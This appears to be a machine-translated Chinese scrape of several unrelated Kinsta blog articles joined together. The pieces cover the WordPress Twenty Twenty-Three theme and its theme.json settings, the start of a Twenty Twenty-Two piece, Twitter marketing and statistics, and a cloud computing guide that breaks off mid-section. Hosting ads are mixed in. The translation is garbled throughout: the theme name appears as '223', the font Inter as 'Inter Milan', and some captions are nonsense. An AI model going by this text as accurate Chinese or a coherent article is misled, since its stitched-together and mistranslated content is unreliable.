举例来说,下图显示了带有和不带有特色图片的单个帖子页面。
Single post preview with and without featured image in Twenty Twenty-Three
下图比较了主页和归档页面。
Home page compared to archive page in Twenty Twenty-Three
即使新主题是 222 的简化版本,与之前的默认主题相比,223 也有一些关键的不同。
首先,标题的大小已经减小,默认的衬线字体已经被一个系统无衬线字体所取代。
Heading sizes in Twenty Twenty-Three
此外,还应用了不同的调色板。您可以在下面来自 theme.json 的代码中看到新的 Twenty 23 调色板定义:
{
"settings": {
"appearanceTools": true,
"color": {
"palette": [
{
"color": "#ffffff",
"name": "Base",
"slug": "base"
},
{
"color": "#000000",
"name": "Contrast",
"slug": "contrast"
},
{
"color": "#9DFF20",
"name": "Primary",
"slug": "primary"
},
{
"color": "#345C00",
"name": "Secondary",
"slug": "secondary"
},
{
"color": "#F6F6F6",
"name": "Tertiary",
"slug": "tertiary"
}
]
},
}
}
Twenty Twenty-Three default colors
但是新的默认主题的主要特点是它的风格变化。Twenty Twenty 3 有十种全球风格变化,每一种都展示了不同的颜色、字体系列和字体大小的组合。
Twenty Twenty-Three Global Styles
您将在 223 个样式文件夹中找到相应的 JSON 文件。
Figma 上提供了 223 个页面模板、样式和样式变体的完整预览。
二十图马上的二十三种风格变奏预告
223 印刷术
在像 23 这样的最小主题中,排版在使文本可读、网站吸引人以及最终为访问者提供有益的浏览体验方面起着关键作用,不管设备和屏幕大小如何。
为此,Twenty Twenty 3 提供了一套新的字体系列,并使用了 WordPress 6.1 引入的流畅排版。
字体
Twenty Twenty 3 采用了一套新的字体,用于各种风格,其特点是简单和多样:
- 系统字体–
var(--wp--preset--font-family--system-font) - IBM Plex Mono–
var(--wp--preset--font-family--ibm-plex-mono) - 国际米兰–
var(--wp--preset--font-family--inter) - Source Serif Pro–
var(--wp--preset--font-family--source-serif-pro) - DM 无——
var(--wp--preset--font-family--dm-sans)
IBM Plex Mono 是 IBM Plex 字体集的一部分,这是在 SIL 开放字体许可( OFL )下发布的新的 IBM 公司字体。你可以在 Adobe 字体网站和 IBM 网站上看到它的预览。
IBM Plex Mono gallery on ibm.com
Inter 是一个由 Rasmus Andersson 为电脑屏幕精心设计的免费开源字体家族。你可以在拉斯姆斯安德森的网站或谷歌字体上预览和下载该字体家族。
Inter typeface preview on Rasmus Andersson’s website
Source Serif Pro 是来自 Adobe Originals 的字体,你可以通过 Adobe Fonts 账户免费使用它(阅读更多关于 Adobe 字体许可)。
Source Serif Pro preview on fonts.adobe.com
DM Sans 是 SIL 开放字体许可证( OFL )下授权的另一种字体,是由谷歌从松香铸造厂委托设计的,由松香铸造厂、Jonny Pinhorn 和 Indian Type Foundry 设计。
DM Sans 上预览谷歌字体
流畅的排版和间距
223 用途流体排版和间距预设随 WordPress 6.1 推出。
新的默认 WordPress 主题提供了一个在 WordPress 主题中实现流畅排版的很好的例子,你可以用它作为一个模板在你的主题中增加对这个特性的支持。
下面的代码展示了 theme.json 中的settings.typography.fluid和settings.typography.fontSizes[]属性定义:
"settings": {
...
"typography": {
"fluid": true,
"fontSizes": [
{
"fluid": {
"min": "0.875rem",
"max": "1rem"
},
"size": "1rem",
"slug": "small"
},
{
"fluid": {
"min": "1rem",
"max": "1.125rem"
},
"size": "1.125rem",
"slug": "medium"
},
{
"size": "1.75rem",
"slug": "large",
"fluid": false
},
{
"size": "2.25rem",
"slug": "x-large",
"fluid": false
},
{
"size": "10rem",
"slug": "xx-large",
"fluid": {
"min": "4rem",
"max": "20rem"
}
}
]
}
}
typography.fluid设置增加了对流畅排版的支持,而typography.fontSizes[].fluid设置最小和最大字体大小值。
除了流体排版,23 还支持流体间距。
在 WordPress 6.1 之前,只能在编辑器中设置自定义间距值。这意味着在 WordPress 6.1 之前,主题作者不能为填充、边距和间距指定固定值。这导致了一些限制。例如,当在不同站点之间复制和粘贴内容和块模式时,不可能容易地在不同主题之间转移间距设置或保持间距值。
主题可以使用新的spacing.spacingScale和spacing.spacingSizes设置声明流体间距支持(在 Theme.json:添加间距大小预设中了解更多)。在 2023 年,这是通过以下设置完成的:
"settings": {
"spacing": {
"spacingScale": {
"steps": 0
},
"spacingSizes": [
{
"size": "clamp(1.5rem, 5vw, 2rem)",
"slug": "30",
"name": "30"
},
{
"size": "clamp(1.8rem, 1.8rem + ((1vw - 0.48rem) * 2.885), 3rem)",
"slug": "40",
"name": "40"
},
{
"size": "clamp(2.5rem, 8vw, 6.5rem)",
"slug": "50",
"name": "50"
},
{
"size": "clamp(3.75rem, 10vw, 7rem)",
"slug": "60",
"name": "60"
},
{
"size": "clamp(5rem, 5.25rem + ((1vw - 0.48rem) * 9.096), 8rem)",
"slug": "70",
"name": "70"
},
{
"size": "clamp(7rem, 14vw, 11rem)",
"slug": "80",
"name": "80"
}
],
"units": [
"%",
"px",
"em",
"rem",
"vh",
"vw"
]
}
}
下面的视频展示了 2023 年的流动印刷技术。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
您可以在设计规范中检查排版和间距预设。
T3】
模板和模板部件
有了 Twenty Twenty 3,你会看到 WordPress 6.1 的所有功能和网站编辑的改进。
对于模板和模板部件来说尤其如此。
Twenty Twenty-Three Templates
当您在您的网站上运行 Twenty Twenty-Three 来启动站点编辑器时,您将看到一个包含 11 个模板和 4 个模板部件的列表。
下图显示了站点编辑器中的 404 模板。
Twenty Twenty-Three 404 page template
你会在二十个二十三的模板和部件文件夹中找到相应的 HTML 文件。
Twenty Twenty-Three Template parts
下图显示了编辑模式下的注释模板部件:
Editing the Comments template part
您会发现在 theme.json 中定义的定制模板和模板部件。
自定义模板
除了默认模板,Twenty Twenty-Three 还提供了以下自定义模板:
- 空白的
- 博客(另类)
- Four hundred and four
- 带有特色图像
- 带盖块
这些模板在 theme.json 中定义如下:
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
{
"customTemplates": [
{
"name": "blank",
"postTypes": [
"page",
"post"
],
"title": "Blank"
},
{
"name": "blog-alternative",
"postTypes": [
"page"
],
"title": "Blog (Alternative)"
},
{
"name": "404",
"postTypes": [
"page"
],
"title": "404"
},
{
"name": "with-featured-image",
"postTypes": [
"page",
"post"
],
"title": "With Featured Image"
},
{
"name": "with-cover-block",
"postTypes": [
"page",
"post"
],
"title": "With Cover Block"
}
],
}
模板部件
模板部件定义如下。
{
"templateParts": [
{
"area": "header",
"name": "header",
"title": "Header"
},
{
"area": "footer",
"name": "footer",
"title": "Footer"
},
{
"area": "uncategorized",
"name": "comments",
"title": "Comments"
},
{
"area": "uncategorized",
"name": "post-meta",
"title": "Post Meta"
}
]
}
全局样式和样式变体
如上所述,从 WordPress 6.0 开始,主题作者可以将多组风格与他们的主题捆绑在一起,使用户能够在风格变化之间切换,而无需改变他们的主题。
这个伟大的 WordPress 特性是新的默认主题的主要特征,因为 Twenty Twenty 3 提供了 10 个预置的风格组合供选择。
Twenty Twenty-Three Global Styles
您可以在站点编辑器的全局样式界面中浏览这些样式。在这里你可以
- 从浏览样式面板切换全局样式。
- 自定义排版设置–文本、链接、标题和按钮
- 编辑默认颜色或更改特定元素的颜色
- 自定义主要内容区域的布局
- 自定义特定元素的外观
Customizing text, colors, and layout in Twenty Twenty-Three
再次值得注意的是,在如此多的风格变化的创造中,社区的参与是至关重要的。在223 个项目启动之后,收到了来自 8 个不同国家的 19 个贡献者的 38 份提交材料(你可以在 GitHub 上探索所有项目)。
从 38 个款式中,选出了 10 个款式变化:
- Pitch 是默认风格的深色版本,使用了 Rasmus Andersson 的 Inter 字体家族。
Pitch is a dark variation of Twenty Twenty-Three
- Canary 使用单一字体大小和窄列宽。它还使用了一个有趣的边界半径效果。
Canary uses a single type size and a narrow column width
- Electric 对整个网站的所有排版都使用粗体颜色。
- 朝圣是基地主题的彩色黑暗版。
- 金盏花是基本款的一种柔和宜人的变体。
- 遮光在图像上具有双色调效果。
- Whisper 展示了一些定制元素,比如页面边缘的边框、按钮样式和独特的链接下划线。
- 冰冻果子露有着独特的明亮多彩的外观
Sherbet has a unique colorful look
- 葡萄因其令人愉悦的调色板和字体组合而被选中。
关于风格变化最酷的事情是,你不一定要成为一个前端开发人员来创建你的风格。
如果你觉得编码很舒服,你可以选择其中一个。json 文件在 223风格文件夹中找到,并使用它作为模板来构建你的风格变化。
但是如果编码不是你的事情,你可以使用官方的创建区块主题插件,你可以从 WordPress.org 插件目录免费下载。
首先,安装并激活插件,然后导航到样式编辑器。在这里,根据您的喜好自定义颜色、排版和布局,并保存您的更改。
Customizing styles in the Global Styles interface
一旦你对你的改变感到满意,在 WordPress 管理菜单的外观下找到创建区块主题。
Create Block Theme menu item
检查列表中的最后一项:创建一个样式变体。您将被要求为您的风格变体指定一个名称。输入名字并点击创建主题。这将创造一个新的。主题的样式文件夹中的 json 文件。
Create a style variation
现在你可以进一步定制你的风格,甚至导出到其他 WordPress 安装。
创建块主题插件是一个有价值的工具,可以充分利用 WordPress 最新版本的主题和模板创建功能。当你这么做的时候,你可以看看所有其他的选项:
- 出口 223
- 创建 223 的孩子
- 克隆 223
- 覆盖 223
- 创建空白主题
- 创建样式变体
A custom style variation appears in the style browser
摘要
虽然乍一看,新的默认 WordPress 主题可能看起来像一种毫无特色的空盒子,但仔细观察,它远不止如此,因为它允许你充分利用最新的 WordPress 站点编辑功能。
在 2023 年,你会看到许多模板和模板部件可以定制,一套 10 种风格的变体可以作为创建独特网站的基础,并支持 WordPress 6.1 中所有可用的新功能,从流畅的排版和改进的模板系统开始。
有了 Twenty Twenty 3,感觉是网站外观和功能之间的差别现在非常明显。主题的唯一功能是规范网站的外观,把添加功能留给插件。从这个角度来看,Twenty Twenty 3 做得很好,为 WordPress 用户提供了所有最新的 Gutenberg 站点编辑功能。定制一个网站的外观从未如此简单。
现在由你决定。你已经在测试环境中使用过新主题了吗?你尝试过创建自定义风格的变化吗?在下面的评论中与我们分享你的想法。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
深入探究 Twenty Twenty 2 和 WordPress Block 主题
虽然比原计划晚了一点,但我们会得到一个新的 WordPress 默认主题。它的名字是 222!
新的 WordPress 默认主题来自于 WordPress 5.9 版本。我们很想了解更多关于新主题的信息,所以我们在运行 WordPress 5.9 的本地开发环境上安装并测试了 Twenty Twenty 2。
在总结我们的想法之前,我们将向您展示我们的结果,为您带来新 WordPress 主题的来龙去脉的深入概述。
A preview of Twenty Twenty-Two, the new WordPress default theme (Image source: WordPress.org)
二十个二十二个被设计成有史以来最灵活、最轻便、最可定制的默认主题。它为测试块、模式和模板提供了一个很好的平台。
作为一个 block 主题,它将帮助你更好地探索完整的站点编辑、全局样式、导航块和新的图库,这些都是 WordPress 5.9 最期待的特性。
我们得马上说222 是第一个默认的街区主题!
新主题最雄心勃勃的目标之一是赋予用户权力。有了这么多现成的模式和模板,用户只需点击几下就可以构建复杂的布局。剩下的只是风格定制。
重要的
222 将在 WordPress 5.9 中发布。在撰写本文时,该主题仍在开发中,在最终发布之前,这里所报告的内容可能会发生重大变化。
从技术的角度来看,写 Twenty Twenty 2 和写 WordPress 5.9 最新最强大的特性没有太大区别。但是 Twenty Twenty 2 为我们提供了一个放大镜,让我们更好地欣赏新的网站编辑功能,并更好地了解该平台的未来。
所以我们在这里向你介绍新的主题。
首先,我们将探索用户将在 WordPress 5.9 和 Twenty Twenty 2 中体验到的新站点编辑流程。
之后,我们将深入探讨 2022 年实现的主要模块主题特性。您将了解全局样式、版块样式、模板和模板零件。
但是关于 Twenty Twenty 2 和 WordPress block 主题还有很多要说的。因此,作为额外的一章,我们将提供一个如何利用 theme.json 文件扩展 Twenty Twenty-2 特性的快速概述。
这里先来看看下一个 WordPress 默认主题!我很高兴能和 @jffng 一起领导它,我们都希望你能为它做出贡献和/或喜欢使用它!🐦🦆🐤🦉https://t.co/covjrpgFIO
— kjellr (@kjellr) October 6, 2021
增强你的社交游戏的 Twitter 营销策略
最近几年,推特已经做出了很多改变,也受到了媒体对 T2 的猛烈抨击。你可能会想象,所有这些行动可能意味着 Twitter 营销作为一种可行的解决方案正在被淘汰,但现实远比这乐观。
多年来,Twitter 一直是互联网上最广泛使用和创新的平台之一。T2 目前平均每秒 6000 条推文,很难想象有一天 Twitter 会不再是一个有价值的交流工具。如果你在过去十年里一直在关注新闻,那么你可能已经对 Twitter 很熟悉了。平台占据了 2009 年的头条,当时美国航空公司的一架飞机坠入哈德逊河,因为它在传统媒体之前发布了新闻。
但是,Twitter 是你企业的营销工具吗?如果成功了,你能采取什么措施来利用这个独特的平台呢?
建立强大的品牌关系和建立强大的 Twitter 营销策略是可能的,但前提是你愿意采取正确的步骤并有耐心。这也需要一些实验和头脑风暴来决定你的品牌的最终方向,但是这种努力是值得的。我们在 Kinsta 使用 Twitter 带来新客户方面取得了巨大成功。😁
不过,在你深入研究之前,你必须了解 Twitter 的现状。因此,首先,让我们来看看 Twitter 目前的一些趋势,以及它们如何影响你在平台上营销品牌的能力。
穿越推特圈(统计)
乍一看,使用 Twitter 进行营销的前景并不乐观。2018 年,该平台的增长实际上从峰值约3.36 亿月活跃用户下降到 3.21 亿。对于一个社交媒体平台来说,这并不是很好的表现,尤其是与脸书和 Instagram 等快速增长的公司相比。
Twitter growth active users (Image source: Statista)
因此,许多品牌反对严肃的 Twitter 营销策略的一个重要原因就是它相对较小。尽管每天有 42%的用户在使用 Twitter,但当你有可能在脸书增加 20 亿活跃用户时,为什么还要使用 Twitter 呢?
需要在这里大声喊出来。Kinsta 太神奇了,我用它做我的个人网站。支持是迅速和杰出的,他们的服务器是 WordPress 最快的。
要记住的关键是,看一下的增长和用户数量只能描绘出画面的一半。你的用户群可能比脸书、 YouTube 或 LinkedIn 要少,但另一方面,你可以通过 Twitter 实现更高层次的品牌互动。或者换句话说,你创造的对话是证明 Twitter 价值的真正标准。与其他任何社交媒体网站相比,Twitter 用户更关注他们所关注的品牌。
Twitter SMB (Image source: Twitter Research)
超过四分之三的 Twitter 用户与企业有过互动,令人印象深刻的是,83%的用户觉得与他们互动过的品牌更有亲和力。这意味着,如果你能创造一个与你的追随者交流的机会,他们会更愿意听你将来要说的话。
Twitter 的另一个对你有利的因素是它的用户找到新的中小型企业(也称为 SMB)并与之互动的频率。根据 Twitter 汇编和发布的研究, 66.4%的用户表示他们通过该平台发现了一个新品牌。
Discovering brands on Twitter (Image source: Twitter Research)
因此,用户希望参与你的品牌,他们正在积极寻找新的业务。你不仅仅是在 Twitter 上现有的受众中钓鱼,因为你的追随者每天都有增长的可能性。
但是 Twitter 最大的好处不是参与度。这是积极的追随者从一个品牌购买的意愿。根据同一项研究,在 Twitter 上关注小企业的用户中,93.3%正计划购买,68.75%已经购买了一些东西。
Twitter customers (Image source: Twitter Research)
因此,你不仅吸引了更多人,而且卖出了更多东西。在不拒绝用户的情况下,你可以比任何其他社交平台更加坦率地介绍你的商品或服务。
Twitter 的最终价值取决于你的品牌,但你很难忽视像你一直在看的这些数字。如果你实现了基本原则并定期发帖,使用 Twitter 作为社交和发展业务的平台可能是一个明智的选择。
为了帮助你推出自己的 Twitter 营销策略,让我们从基础开始。然后,你可以在这篇文章的结尾更深入地探究一些更成熟的策略。
推特上的基础知识
多年来,Twitter 依赖于一个按时间倒序显示每条推文或撤退的 feed。没有任何过滤或策划。
但近年来,Twitter 已经走上了人工智能和算法的道路,为用户提供更好的整体体验。虽然他们可能会有更好的浏览时间,但这给品牌带来了一些问题,这些品牌过去只是通过在正确的时间发布来保证印象和参与。
为了应对这种下滑趋势,Twitter 自己发布了一份关于创造好内容的基本指南。为了帮助你理解这些建议为什么有效,我们将更进一步,向你展示通过遵循这个指南而成功的研究和品牌的数据。
基本原则 1:保持简短
自 2006 年创建以来,Twitter 已经将其用户限制在 140 个字符以内。多年来,这导致了一些颇具创意的缩写,简短的咆哮,甚至创造了网址缩写。
但在 2017 年,Twitter 做了一件不可思议的事情。他们的角色数量增加了一倍,达到 280 个。😮对一些人来说,这就像是久旱之后的一场大雨,而另一些人则不那么热情。
如果你不仔细看,这一变化中最有趣的部分很容易被忽略。不管你怎么想,用户在他们的推文中继续依赖更短的交流方式。
Tweets vs characters (Image source: SocialMediaToday)
这可能只是十几年来养成的 140 个字符的习惯,但在改变字符限制后的几个月里,只有 1%的推文使用了完整的字符分配。保持简短甜蜜的趋势保持稳定。
同样值得注意的是,仔细想想,280 个字符并不算多。这一段之前的段落只有大约 240 个字符,所以你仍然没有得到超过几个句子来传达你的信息。
虽然用户倾向于不超过 280 个字符,但事实证明,延长你的短信可以给你更多的喜欢。
Likes per impressions on Tweets (Image source: SocialMediaToday)
但无论你如何摇摆这个话题,Twitter 是一个重视简洁高于一切的社交平台。即使有能力延长你的帖子,但更有可能的是,有独特倾向的简洁俏皮话仍然是 Twitter 的首选。
哦,顺便说一句,我正在建造一个机器人龙
—埃隆·马斯克(@ Elon Musk)2018 年 4 月 25 日
令人兴奋的推特统计数据和我们最喜欢的网络上的事实(2022)
没有一天没有多家新闻网络和深夜节目主持人从社交媒体和微博巨头 Twitter 上下载推文,以了解当今快节奏世界发生的事情,并沿途发布 Twitter 统计数据和事实。
Twitter 是一个受新闻媒体青睐的平台,因为它能够发送实时更新,但它也很受营销人员的欢迎,他们使用网络通过使用标签在社交上听取对他们企业产品和服务的反馈。
当谈到 Twitter 的事实和统计数据时,没有什么比该公司成立以来引起的骚动更大的了,当时一条推文允许的字符数翻了一番:从 140 到 280。😮当然,你越深入研究 Twitter 的统计数据,你就越能理解平台的重要性。
T3】
历史上的一条推文
第一条推文是杰克·多西在 2006 年 3 月 21 日发出的,当时这个社交网络被称为“twttr ”,还没有推出。当月由多尔西、伊万·威廉姆斯、诺亚·格拉斯和比兹·斯通创建的 Twitter 直到当年 7 月才正式对公众开放。
正在设置我的 twttr
—杰克(@杰克)2006 年 3 月 21 日
云计算的类型—2022 年云解决方案和技术的广泛指南
今天,云计算已经过渡成为一种主流技术,有许多不同类型的云计算可供选择。根据最新的云状态报告,估计有 94%的企业至少在使用一种云服务。
然而,云增长的能力仍然呈指数增长,IBM 委托的一项研究报告称,目前只有 20%的企业工作负载在云中运行。仅仅迁移了最简单的工作负载,企业的云之旅还有很长的路要走。由于 80%的企业工作负载仍在内部运行,它们的迁移将代表当前云市场的潜在四倍增长。
尽管云市场已经成熟,但许多组织仍然不了解可用的云计算服务和部署模式。在包括谷歌、亚马逊和微软在内的技术领导者不断创新的推动下,几乎每天都有新的云产品和服务出现。
为了帮助您驾驭云计算的复杂性,我们将深入了解可用的云计算类型。我们还将介绍一些最流行的云服务,包括一些正在兴起的新兴技术。
云计算主要有哪些类型?
在最高级别,云计算是通过服务和部署模型的组合来交付的。在这些云交付模式中,有三种类型的云计算和“即服务即服务”产品可供选择。
让我们来详细探讨一下。
云计算服务模式
有三种主要的云计算服务模式——基础设施即服务、平台即服务和软件即服务。每个服务模型代表云计算堆栈的一个不同部分,并且在您和服务提供商之间有自己独特的责任分工。
Split of Management Responsibilities for Cloud Computing Service Models (Image source: bmc.com)
在每种云计算服务模式中,有 100 多种不同的云服务可供选择——我们将在本文稍后探讨。现在,让我们仔细看看三种主要的服务模型。
基础设施即服务(IaaS)
基础架构即服务(IaaS) 是构成云技术部署基础的服务模式。通过 IaaS 提供商,您可以通过互联网按需访问核心 IT 资源,包括计算机(虚拟或专用硬件)、网络和存储。
IaaS 为您提供了对灵活的一流硬件资源的访问,这些资源可以进行扩展以满足您企业的处理和存储需求。您可以利用这一基础设施来供应您组织的应用程序、软件和平台,而无需承担管理和维护的责任。
IaaS 部署的一个典型示例是将虚拟机和存储磁盘结合起来。无论是服务器操作系统还是存储容量大小,每个元素都经过定制,以满足您的业务需求。
平台即服务(PaaS)
平台即服务(PaaS) 是一种云服务模式,您可以通过服务提供商访问组合的硬件和软件工具。PaaS 最常用于应用程序开发。
PaaS 提供商让您能够访问应用程序开发所需的组合云基础架构(数据库、中间件、操作系统、服务器),而不会带来管理 it 的复杂性。这让你变得更有效率。您不再花时间安装和配置基础架构,而是专注于开发、运行和管理应用程序。
软件即服务(SaaS)
软件即服务(SaaS) 是一种云服务模式,让您能够访问由服务提供商运行和管理的完整软件产品。大多数 SaaS 解决方案倾向于终端用户应用程序。
使用 SaaS 模型访问您选择的软件,可以让您将精力完全放在如何最好地利用该软件上。SaaS 提供商负责提供、维护和升级软件,包括底层基础设施。
一个常见的 SaaS 例子是基于 web 的客户关系管理(CRM)解决方案。您可以通过 CRM 存储和管理您的所有联系人,而无需将软件升级到最新版本或维护运行该软件的服务器和操作系统。
传统的云服务模式支柱(IaaS、PaaS、SaaS)经过多年的发展,已经包含了大量的附加产品,我们现在正在进入一个“一切即服务”的时代。
让我们来看一下。
一切即服务(XaaS)
也称为任何东西即服务,XaaS 的首字母缩写词是一个通用术语,涵盖了作为新的和受欢迎的服务产品出现的大量产品、工具和技术。
这些新服务的爆炸式增长——以及相关的首字母缩写——已经达到了这样一个水平,以至于现在存在的目录仅仅是为了保持跟踪。这些云服务模型迭代中的每一个都是一个潜在的数十亿美元的产业。最受欢迎的服务包括桌面即服务(DaaS)、人工智能即服务(AIaaS)和统一通信即服务(UaaS)。
T3】
云计算部署模型
一旦您选择了所选的云服务,您就可以选择三种主要的云计算部署模式:公共云、私有云以及混合云。
Cloud Deployment Models (Image source: AVI Networks)
像云服务模型一样,每个云部署模型都有自己独特的设置,有一系列不同的要求和相关的好处。
建议阅读:2022 年云计算的诸多好处
让我们仔细看看:
公共云
公共云是由第三方提供商通过公共互联网提供的计算服务。任何想使用公共云服务的人都可以使用公共云服务,可以免费使用,也可以付费使用。
在公共云部署中,管理和维护系统的责任直接落在提供商身上。尽管公共云和私有云体系结构可能完全相同,但每个云部署的安全要求可能存在显著差异。
公共云部署模式消除了购买、管理和维护内部硬件和软件基础架构的昂贵前期成本。由于公共云技术提供商谷歌、微软和亚马逊的庞大规模,它还提供了快速部署和几乎无限的可扩展性。
私有云
私有云是通过互联网或私有内部网络为单个组织提供计算服务。私有云可以在内部管理,也可以由第三方提供商管理。
私有云部署将为您提供许多与公共云相同的优势,包括自助服务和可扩展性。与公共云相比,您还可以更好地控制和定制您在私有云中使用的服务。这意味着您可以实现更高级别的安全性和隐私性——如果您所在的行业要求合规性,这是理想之选。
然而,这些额外的好处是有代价的。在大多数部署中,管理私有云的成本和责任仍由您的 IT 部门承担。这意味着私有云部署速度较慢,并且与传统数据中心拥有者一样,需要支付相同的费用(人员配备、管理和维护)。
混合云
混合云是通过公共云和私有云部署的组合来提供计算服务。这种类型的部署允许在两个云环境之间共享数据和应用程序。
混合云使您能够无缝地将资源从内部私有基础架构扩展到公共云,以满足处理计算需求的波动。这允许您将公共云资源用于非敏感计算任务,同时在私有云部署中保持敏感的业务关键型应用程序的安全。
如果使用有效,混合云部署允许您扩展并满足短期资源需求的高峰,而不需要长期投资。混合计算是一个提供“两全其美”的平台,使您能够获得云计算的全部优势——灵活性、可扩展性和成本效益,以及最低的可能风险暴露。
其他云部署模式
除了三种最常见的云部署模式和混合模式之外,还有其他鲜为人知的部署选项:
社区云
一种云部署模型,构建在具有共同关注点的多个组织的共享基础架构上。社区云很受欢迎,因为它们进一步在相关组织之间分摊了资源成本。
分布式云
这种类型的云部署由分布在不同位置但连接到单一网络的一组机器组成。它可以作为公共资源创建,也可以使用自愿资源创建。
多云朵
多云是一种不同的云部署,它结合了多个云服务提供商(不要与混合云混淆)。选择多云方法可以减少您对单一服务提供商的依赖,同时通过更多选择提供更大的灵活性。
聚云
这是来自多个服务提供商的云部署的组合,以利用特定的服务。与多云的目的不同,聚云允许您实现比使用单一提供商更多的目标。
高性能计算云
这是一个特定的云部署模型,旨在促进高性能计算(HPC)应用程序。您将使用 HPC 云部署来执行大规模研究或解决高级问题。
云服务有多少种?
在每种云服务模式中,都有数百种不同的云服务可供选择。您可以选择的云服务几乎每周都在增加。
受传统内部服务向云的迁移和不断的技术创新的推动,新的云原生服务应运而生。
Google Cloud Platforms Cloud Services
您对云服务提供商的选择将直接影响您可以选择的云服务范围。三大领先的云服务提供商——谷歌云、亚马逊网络服务和微软 Azure——为您提供广泛的服务,以满足您的计算需求。
当然,所有这些选择可能会让人不知所措,而且通常很难理解不同类型的可用云服务。为了帮助您开始理解和驾驭这个复杂的技术云计算生态系统,我们探索了核心和新兴的云服务类别及其相关的云服务。
核心云服务类别
以下是云服务类别,其中包括您将在传统内部部署中使用的核心服务。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
云计算服务
云中的计算服务是构建和运行组织技术的基础架构。虚拟机(VM)将构成您计算服务的核心。
云服务提供商提供了大量的虚拟机选项,可以运行你能想象到的任何工作负载。您的虚拟机的每个方面都可以进行配置,以满足您企业的独特计算要求,包括操作系统、内核数量、位置、连接的存储。这包括扩展您每天需要的虚拟机实例数量,以满足您不断变化的计算需求。
云计算还包括服务器迁移、容器管理和无服务器计算等服务。以下是三大领先云服务提供商提供的主要云计算服务:
云网络服务
您的网络是基础设施的另一个基石。您选择的云服务提供商的网络基础设施将直接决定您的云服务的安全级别、可用性、速度和覆盖范围。
领先的云服务提供商将为您提供全球区域和位置网络。每个公司都在不断努力改进其网络基础设施,以提供更好的带宽和更快的下载速度。
云网络通常包含以下服务:
- 内容交付网络(CDN)–一种通过多个地理位置交付内容的方式,以提供高速和低延迟
- 专用互连–直接访问云提供商的高速网络
- 域名系统(DNS)–一种可扩展的方式,通过 DNS 将用户路由至互联网应用
- 负载平衡——一种在多个资源之间分配传入流量的工具
- 虚拟专用网络(VPN)–安全且隔离的云资源
谷歌云平台是独一无二的,它还提供额外的高级网络层。这使您能够访问谷歌的高性能、低延迟、高度可靠的全球网络。
这可能会影响您的云服务交付质量,例如网站速度会直接影响用户体验、参与度甚至销售额。
我们理解一个伟大网络的重要性,这就是为什么 Kinsta 为我们所有的客户使用谷歌云平台的高级层。
Google Cloud Platform Premium Tier (Image Source: Google)
以下是三大领先云平台提供商提供的主要云网络服务:
- Google Cloud—虚拟私有云(VPC) ,云 DNS ,云 CDN ,云负载均衡,还有更多
- 亚马逊 Web 服务——亚马逊 VPC 、亚马逊 Route 53 、 AWS 直连、弹性负载均衡、更多
- 微软 Azure—Azure 虚拟网络、 Azure DNS 、 Azure 内容交付网络、 Azure 负载均衡器,还有更多
云存储服务
云中的存储包括利用云服务提供商的基础设施来安全地存储您的数据、应用和工作负载。
与虚拟机的定制非常相似,云服务提供商为您提供了多种存储配置选项,可以根据您的业务需求进行扩展,包括磁盘大小,存储量和位置。他们还将支持不同的存储类型,包括块、文件和对象存储。
某些云服务提供商还提供一系列数据传输服务,帮助您快速、安全地将大量数据迁移到他们的基础架构中。
以下是三大领先云平台提供商提供的主要云存储服务:
- Google Cloud—云存储、持久磁盘、云文件存储、数据传输服务以及更多
- 亚马逊网络服务—亚马逊 EBS 、亚马逊 EFS 、亚马逊 S3 、数据传输服务以及更多
- 微软 Azure-磁盘存储、文件存储、 Blob 存储,还有更多
云安全、身份和合规服务
云中的安全性、身份和合规性由一系列工具和服务组成,旨在控制对云基础架构的访问、防范攻击并维护数据隐私。
一些世界上最大的品牌和行业依赖于 Kinsta 的企业 WordPress 主机。从创业公司,到代理公司,以及财富 500 强公司。准备好开始了吗?查看我们的计划
最常见和最关键的云安全服务包括:
- 审计–一个工具跟踪所有用户活动,并创建一个审计日志,记录在您的云平台中谁在何时何地做了什么。
- 合规性–一系列工具和控制,帮助您跟踪和维护法规合规性。
- DDoS 防护——一种旨在识别和缓解 DDoS 攻击的工具,旨在防止应用程序停机并最大限度地减少基础设施的延迟。
- 加密–提供静态和传输中的加密,防止您的数据被窃取。
- 防火墙–一组防火墙工具,用于过滤恶意网络流量并集中管理防火墙规则。
- 身份和访问管理–一个平台,用于管理用户身份并控制谁可以访问什么,以及他们可以使用该访问权限做什么
- 威胁检测–识别云环境中潜在威胁的工具。
信息
Kinsta 实施硬件防火墙、主动和被动安全以及其他高级功能,以防止访问客户的数据。查看我们的计划。
以下是三大领先云平台提供商提供的主要云安全服务:
- Google Cloud-Cloud IAM,云审计日志,云安全指挥中心,还有更多
- 亚马逊网络服务—亚马逊认知、 AWS 盾、 AWS 安全中枢、 AWS 防火墙管理器以及更多
- 微软 Azure-Azure Active Directory、 Key Vault 、 Azure 安全中心,还有 more
云分析服务
云中的分析由一系列工具和框架组成,帮助您分析数据并从中提取有价值的见解(想想云服务的 Google Analytics )。随着大数据对企业变得越来越重要,云分析服务的可用性和复杂性不断提高。
主要的云服务提供商提供一系列云分析服务,帮助您存储、处理、分析和可视化数据。
我们了解分析软件的重要性以及它对您的业务的积极影响。我们的分析平台 MyKinsta Analytics ,为您提供所需的网站性能数据的可见性,以快速调查和解决任何问题。确保你的 WordPress 网站——你的主要销售工具——处于最佳状态。
主要的云提供商平台还提供与开源分析工具的深度集成,如 Apache Spark 和 Apache Hadoop 。
以下是三大领先云平台提供商提供的主要云分析服务:
- Google Cloud-big query、云数据流、 Google Looker Studio ,还有 more
- 亚马逊网络服务-亚马逊雅典娜,亚马逊 EMR ,亚马逊红移,还有更多
- 微软 Azure-数据湖分析、高清洞察、 Azure Synapse 分析,以及更多
云数据库服务
